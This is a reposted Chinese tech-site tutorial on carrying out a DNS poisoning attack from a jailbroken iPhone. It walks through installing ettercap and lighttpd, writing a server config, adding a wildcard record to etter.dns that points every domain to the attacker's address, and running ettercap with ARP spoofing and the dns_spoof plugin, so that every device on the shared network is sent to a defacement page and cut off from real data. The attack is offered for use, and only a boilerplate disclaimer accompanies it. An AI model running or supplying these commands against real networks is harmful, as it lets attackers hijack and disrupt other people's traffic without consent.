知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 安全资讯

在iOS平台上实施DNS毒化攻击

发布时间:2014-07-15 11:50:30作者:知识屋

 刚刚在习科上看到一篇原创的ios上进行dns投毒的攻击,挺好的,mark一下;

首先,推荐一个Cydia的软件源给大家:ininjas.com/repo
里面可以找到一些基础的工具,比如dsniff,set,msf,nmap......还有我们今天的主角ettercap
DNS毒化与ettercap的详细信息大家自己查一下,在此就不解释了

添加软件源后,我们用iSSH打开一个本地终端(需安装openssh,具体方法百度),输入:
 

apt-get install lighttpd nano ettercap-no-gtk #安装一个web服务器和文本编辑器与ettercap
mkdir /var/web #创建一个名为web的文件夹
cd /var/web #转到该目录
nano lighttpd.conf #创建一个名为lighttpd.conf的文件并进入编辑模式

将以下代码粘贴进终端
 

server.modules = ("mod_fastcgi","mod_access", "mod_accesslog", "mod_cgi") #载入的模块
server.document-root = "/var/web/" #网站根目录
server.errorlog = var.CWD + "/lighttpd.errors" #错误日志的存放位置

server.port = 80 #默认端口,一般不需要设置,已注释掉

server.bind = "192.168.43.45" #主机ip地址,一般不需要设置,已注释掉

index-file.names = ("index.php", "index.", "index.htm", "default.htm") #默认主页
mimetype.assign =(".html" => "text/html", ".htm" => "text/html") #格式解析
server.event-handler = "freebsd-kqueue" #软件平台

ios-dns1
图1

完毕后按ctrl+o保存,再按ctrl+x退出(ctrl键在左上角的那个-号里)

继续输入:
nano /usr/local/share/ettercap/etter.dns

用方向键(在左上角的-号里)把光标移动到最后一行,输入:
..* A 自己的ip

ios-dns2
图2

ctrl+o ctrl+x 保存退出

接下来大家可以把自己的黑页用ifile放进/var/web,在这我就简单的写了个网页

好的,那么接下来就是重头戏。在终端输入:
 

lighttpd -f /var/web/lighttpd.conf #开启web服务器
ettercap -T -q -P dns_spoof -M arp:remote // // #参数-T使用文本模式,-q不回显,-P使用插件,-M运行模式

 

ios-dns3
图3

载入完毕后,同一局域网的设备打开任意网址都会转到这个黑页,并且所有客户端软件都将无法获得新数据,那么你便成功实施了一次DNS毒化攻击

ios-dns4
图4

ios-dns5
图5

 

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜